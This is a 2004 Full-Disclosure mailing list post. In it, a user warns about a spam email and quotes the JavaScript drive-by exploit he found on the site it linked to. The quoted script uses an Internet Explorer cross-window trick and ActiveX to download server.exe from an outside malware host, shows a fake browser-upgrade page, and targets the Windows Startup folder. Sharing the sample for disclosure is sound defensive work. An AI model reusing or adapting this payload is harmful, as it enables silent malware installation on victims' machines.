lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <413D7DB9.DF3FE8A0@gmx.de>
From: shugal at gmx.de (Martin Stricker)
Subject: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle
 shot!]

I just got attached e-mail. On the linked website I found this exploit
code (sorry for the line breaks):
<script>
function govuln(){ 
var w=window.open("javascript:setInterval(function(){try{var
tempvar=opener.location.href;}catch(e){location.assign('javascript:var
xmlHTTP = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);xmlHTTP.open
(&quot;GET&quot;,&quot;http://real.slon.biz/server.exe&quot;,false);xmlHTTP.send();var
contents =
xmlHTTP.responseBody;document.innerHTML=(&quot;&lt;title&gt;You Need a
better browser&lt;/title&gt;&lt;DIV ID=DS2 align=center
style=position:absolute;left:10;top:-30;&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;font
face=arial color=black&gt;&lt;b&gt;This web page requires Opera
Comptable browser&lt;/b&gt;&amp;nbspYou can download Opera from the
&lt;a href=http://www.opera.com&gt;Opera &lt;frame src=log.php
name=frame1 scrolling=no frameborder=no noresize=noresize&gt;Software
Group web
site&lt;/a&gt;.&lt;/center&gt;&lt;/div&gt;&lt;html&gt;&lt;iframe
src=shell:startup HEIGHT=5000; WIDTH=5000
style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-index:-90;&gt;&lt;/iframe&gt;&lt;body
onload=showpop()&gt;&lt;script&gt;function
showpop(){pop=window.createPopup();pop.document.body.style.margin=0;pop.document.body.innerHTML=txt.value;pop.show(100,100,screen.width+300,screen.height+300);}&lt;/script&gt;&lt;span
style=position: absolute; left: 1; top: 1
id=absspan&gt;&lt;/span&gt;&lt;textarea id=txt rows=1 cols=20
style=display:none&gt;&lt;html&gt;&lt;body&gt;&lt;table width=100%
height=100%&gt;&lt;tr ALIGN=LEFT
VALIGN=TOP&gt;&lt;br&gt;&lt;center&gt;&lt;img
src=http://real.slon.biz/server.exe id=anch
onmousedown=parent.pop.show(1,1,1,1);
style=width=4000px;height=4000px;background-image:url(&amp;quot;http://real.slon.biz/1.gif&amp;quot;);&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/textarea&gt;&lt;/body&gt;&lt;/html&gt;&quot;)');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000"); 
w.location.assign=location.assign; 
location.href="http://localhost"; 
} 
govuln() 
</script>
-- 
Homepage: http://www.martin-stricker.de/
Linux Migration Project: http://www.linux-migration.org/
Webmaster-Forum: http://www.masterportal24.com/cgi-bin/yindex.cgi
Red Hat Linux 9 for low memory: http://www.rule-project.org/
Registered Linux user #210635: http://counter.li.org/
-------------- next part --------------
An embedded message was scrubbed...
From: CNN News Germany <gil@...v.de>
Subject: George Bush sniper-rifle shot!
Date: Sat, 04 Sep 2004 03:25:28 +0000
Size: 2407
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040907/14b5d37a/attachment.mht

Powered by blists - more mailing lists